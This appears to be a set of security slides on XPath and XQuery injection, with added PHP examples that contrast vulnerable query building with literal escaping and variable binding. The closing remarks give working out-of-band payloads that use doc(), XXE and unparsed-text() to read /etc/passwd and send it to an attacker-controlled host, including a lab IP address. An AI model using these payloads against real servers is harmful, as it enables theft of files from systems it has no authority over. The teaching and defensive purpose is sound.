4. XPath
XPath is used to navigate through elements and
attributes in an XML document.
XPath became a W3C Recommendation on 16 November 1999.
XPath is a major element in W3C's XSLT standard, and XQuery and XPointer are both built on XPath expressions.
Standards: 1.0, 2.0, 3.0.
6. XPath examples
<root>
<?xml-stylesheet type="text/css" href="mystyle.css" ?>
<namespace xmlns="http://www.w3.org/1999/xhtml"/>
<News>
<current_news>
<page ID="1">
<!-- this is comment1 -->
<info>British people are my only 'boss' on EU reform, says David Cameron</info>
</page>
<page ID="2">
<!-- this is comment1 -->
<info>BoE says part of banking payment system down</info>
</page>
</current_news>
</News>
</root>
/root/News/current_news/page[@ID='1']/info/text()
//page[1]//text()
/*[1]/*[2]/*[1]/*[1]/*[1]/text()
All three select the headline text of page 1. The third expression navigates by position only; note that the xml-stylesheet processing instruction is not an element, so News is the second element child of root (namespace is the first), not the third.
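The three expressions run against the slide's document, as an added example in PHP (DOMXPath) that is not part of the original slides. It also shows what happens when the value inside the first predicate is attacker-controlled, and a helper for embedding an arbitrary string as an XPath 1.0 literal; xpathLiteral and infoTextsForId are names chosen here, not PHP or XPath functions.

```php
<?php
// Added example (not from the original slides): evaluate the slide's XPath
// expressions with DOMXPath, show how a quote-breaking value in the ID
// predicate changes the result, and build a safe XPath 1.0 string literal.

// The example document from slide 6, embedded inline (constructed input).
$xml = <<<'XML'
<root>
<?xml-stylesheet type="text/css" href="mystyle.css" ?>
<namespace xmlns="http://www.w3.org/1999/xhtml"/>
<News>
<current_news>
<page ID="1">
<!-- this is comment1 -->
<info>British people are my only 'boss' on EU reform, says David Cameron</info>
</page>
<page ID="2">
<!-- this is comment1 -->
<info>BoE says part of banking payment system down</info>
</page>
</current_news>
</News>
</root>
XML;

$doc = new DOMDocument();
$doc->loadXML($xml);
$xp = new DOMXPath($doc);

// XPath 1.0 has no escape sequence inside string literals. A value with only
// one kind of quote is wrapped in the other kind; a value with both kinds is
// split on the single quotes and reassembled with concat('a', "'", 'b').
function xpathLiteral(string $value): string
{
    if (strpos($value, "'") === false) {
        return "'" . $value . "'";
    }
    if (strpos($value, '"') === false) {
        return '"' . $value . '"';
    }
    $parts = explode("'", $value);
    return "concat('" . implode("', \"'\", '", $parts) . "')";
}

// Returns the <info> texts for an ID, either by splicing the raw value into
// the predicate (vulnerable) or by embedding it as a literal (safe).
function infoTextsForId(DOMXPath $xp, string $id, bool $safe): array
{
    $expr = $safe
        ? "/root/News/current_news/page[@ID=" . xpathLiteral($id) . "]/info/text()"
        : "/root/News/current_news/page[@ID='" . $id . "']/info/text()";
    $out = [];
    foreach ($xp->query($expr) as $node) {
        $out[] = $node->nodeValue;
    }
    return $out;
}

// The three expressions from the slide. The processing instruction is not an
// element, so News is the second element child of root in the positional path.
foreach ([
    "/root/News/current_news/page[@ID='1']/info/text()",
    "//page[1]//text()",
    "/*[1]/*[2]/*[1]/*[1]/*[1]/text()",
] as $expr) {
    echo $expr, "\n";
    foreach ($xp->query($expr) as $node) {
        if (trim($node->nodeValue) !== '') {   // skip whitespace-only text nodes
            echo "  ", trim($node->nodeValue), "\n";
        }
    }
}

// Injection: the predicate becomes @ID='1' or '1'='1' and matches every page.
print_r(infoTextsForId($xp, "1' or '1'='1", false));  // both headlines
// Same value as a literal: the predicate compares against the whole string,
// no page has that ID, so nothing is returned.
print_r(infoTextsForId($xp, "1' or '1'='1", true));
```

The literal-building approach is the fallback for XPath 1.0 engines such as DOMXPath that cannot bind variables; where the engine supports external variables (XQuery, XPath 2.0+ processors), binding the value is the better fix because the query text never changes.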
7. XQuery
XQuery is to XML what SQL is to database tables.
XQuery 1.0 became a W3C Recommendation
January 23, 2007.
XQuery is designed to query XML data - not just
XML files, but anything that can appear as XML,
including databases.
Standards: 1.0, 3.0.
8. XQuery examples
<root>
<?xml-stylesheet type="text/css" href="mystyle.css" ?>
<namespace xmlns="http://www.w3.org/1999/xhtml"/>
<News>
<current_news>
<page ID="1">
<!-- this is comment1 -->
<info>British people are my only 'boss' on EU reform, says David Cameron</info>
</page>
<page ID="2">
<!-- this is comment1 -->
<info>BoE says part of banking payment system down</info>
</page>
</current_news>
</News>
</root>
for $i in doc("examples/example.xml")//page[@ID="1"]/info/text() return <h3> {$i} </h3>
11. XML document
<Root>
<News ID="1">
<info>British people are my only 'boss' on EU reform, says David Cameron</info>
</News>
<News ID="2">
<info>BoE says part of banking payment system down</info>
</News>
<News ID="3">
<info>Current exchange rate US DOLLAR (USD) - ≤50 RUSSIAN RUBLE (RUB)</info>
</News>
</Root>
12. Vulnerable code
// $param comes from the request and is spliced straight into the XQuery text.
public function select($param)
{
$this->session->execute("open ".$this->database);
// The value sits inside the double quotes of the @ID predicate, so a $param
// containing a double quote closes the literal and rewrites the predicate.
$input = 'for $i in doc("tests/news.xml")//News[@ID="'.$param.'"]'.
'/info/text() return <h3> {$i} </h3>';
$query = $this->session->query($input);
while($query->more()) {
print $query->next()."\n";
}
$query->close();
}
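A hardened variant of select() for the BaseX PHP client, as an added example that is not part of the original slides. The query text becomes a constant that declares an external variable, and the user value is passed through the client's Query::bind() so it can never change the structure of the query; the numeric allow-list on top of that is a design choice here, justified by the IDs in news.xml. It assumes the same $this->session and $this->database members as the vulnerable version; selectSafe is a name chosen here.

```php
<?php
// Added example (not from the original slides): parameterized version of the
// vulnerable select(). Assumes $this->session is a BaseX client Session and
// $this->database the name of the database to open, as on slide 12.
public function selectSafe($param)
{
    // Allow-list on top of binding: every News/@ID in news.xml is numeric.
    if (!ctype_digit((string) $param)) {
        throw new InvalidArgumentException('ID must be numeric');
    }

    $this->session->execute("open " . $this->database);

    // The query is a constant. $id is declared external and bound below;
    // @ID (untypedAtomic) is compared with the bound string value as a string,
    // so a value like 1" or "1"="1 is looked up literally and matches nothing.
    $input = 'declare variable $id external; ' .
        'for $i in doc("tests/news.xml")//News[@ID = $id]/info/text() ' .
        'return <h3>{ $i }</h3>';

    $query = $this->session->query($input);
    $query->bind("id", $param);   // bound as a value, never spliced into the text

    while ($query->more()) {
        print $query->next() . "\n";
    }
    $query->close();
}
```

With the original select(), a $param of 1" or "1"="1 turns the path into //News[@ID="1" or "1"="1"] and returns all three headlines from slide 11; with selectSafe() the same input is rejected by the allow-list, and even without the allow-list it would be compared as one opaque string.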
22. Remarks
• Does not work in Sedna
• XXE with doc: the inner doc() fetches an attacker-hosted XXE.xml whose DOCTYPE pulls a local file into the document, encode-for-uri() makes the result URL-safe, concat() appends it to the attacker's URL, and the outer doc() requests that URL, so the file contents leave the server in the request path (out-of-band exfiltration; "Your public ip" stands for the attacker-controlled host)
doc(concat("Your public ip",encode-for-uri(doc("Your public ip/XXE.xml"))))
• unparsed-text: the same channel without any XML parsing, since unparsed-text() reads an arbitrary local file as a string
doc(concat("Your public ip",encode-for-uri(unparsed-text("/etc/passwd"))))
• XXE and BaseX: BaseX accepts an inline XML string as the argument of doc(), so the DOCTYPE with the external entity can be supplied inside the query itself. Inner double quotes are doubled, as XQuery string literals require, and the entity reference is written &amp;c; because a string literal only accepts predefined entity references; the XML parser then sees &c; and resolves it
doc(concat("http://192.168.56.101:9090/",encode-for-uri(doc("<?xml version=""1.0"" encoding=""UTF-8""?><!DOCTYPE input [<!ELEMENT input (#PCDATA)><!ENTITY c SYSTEM '/etc/passwd'>]><input>&amp;c;</input>"))))